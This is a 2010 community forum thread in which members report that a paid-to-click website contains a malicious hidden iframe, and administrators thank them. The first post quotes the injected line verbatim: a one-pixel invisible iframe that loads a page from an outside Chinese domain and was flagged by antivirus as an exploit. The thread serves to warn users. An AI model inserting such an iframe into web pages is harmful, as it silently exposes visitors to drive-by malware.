Global Friends Online

Please login or register.

Login with username, password and session length
Advanced search  

News:

December 1, 2009: Addition to the Rules

Pages: [1]   Go Down

Author Topic: Naughtynniceptc.info contains malicious iframe [Resolved]  (Read 297 times)

0 Members and 1 Guest are viewing this topic.

danddwah

  • ex Jewel Game Grand Master
  • Global Program Owner
  • Global Relative
  • ***
  • Offline Offline
  • Posts: 453
    • WWW
Naughtynniceptc.info contains malicious iframe [Resolved]
« on: January 23, 2010, 02:11:29 AM »
 This HTML code is dangerous and may harm your computer 
<iframe width="1" height="1" frameborder="0" src="http://www.liagand.cn/hlp/?id=9"></iframe>

Whilst Deb was doing some clicking we received a Microsoft Security Essentials Alert for Exploit:HTML/IframeRef.gen

Firebug revealed the above line of code in the home page for naughtynniceptc.info

The owner has been sent a message via the contact link.
Dave

Should have looked two posts down and seen this was already reported lol

Edited to update thread title - Thanks for reporting.
« Last Edit: July 27, 2010, 10:04:50 AM by Craig »
Logged

pandabearemails.net & whitetigeremails.com

Cubby

  • Global Administrator
  • Global Family
  • *****
  • Offline Offline
  • Posts: 4027
Re: Naughtynniceptc.info contains malicious iframe
« Reply #1 on: January 23, 2010, 03:46:46 AM »
Thank you so much for reporting this.

First thread is here http://www.globalfriendsonline.com/index.php/topic,7059.0.html

Any reports are always appreciated!
Logged

Not much of a signature I know..

bell

  • Global Pal
  • **
  • Offline Offline
  • Posts: 90
Re: Naughtynniceptc.info contains malicious iframe
« Reply #2 on: January 24, 2010, 06:26:28 PM »
NOD32, 3-4 days, only this link:
 This HTML code is dangerous and may harm your computer 
http://www.naughtynniceptc.info/index.php?ref=tesharika   HTML/Iframe.B.Gen

« Last Edit: January 24, 2010, 06:28:02 PM by bell »
Logged

Craig

  • Global Moderator
  • Global Family
  • *****
  • Offline Offline
  • Posts: 2912
    • WWW
Re: Naughtynniceptc.info contains malicious iframe
« Reply #3 on: January 24, 2010, 06:43:08 PM »
Thank you Bell  :)
Logged

Owner Of The Internet-Earners.com Site & Forum

Tlady

  • Global Program Owner
  • Global Buddy
  • ***
  • Offline Offline
  • Posts: 182
Re: Naughtynniceptc.info contains malicious iframe
« Reply #4 on: February 16, 2010, 04:53:25 PM »
I had ads running for both at countryfolksptr- naughtynnice and daydreamclicking ( I'm tesharika btw) I have deleted both of them!
Logged
Pages: [1]   Go Up
« previous next »
 



Tri-Peak Solitaire | Cashin Clicks | Used Paperback Books | Need extra money for personal spending? | That Animal Site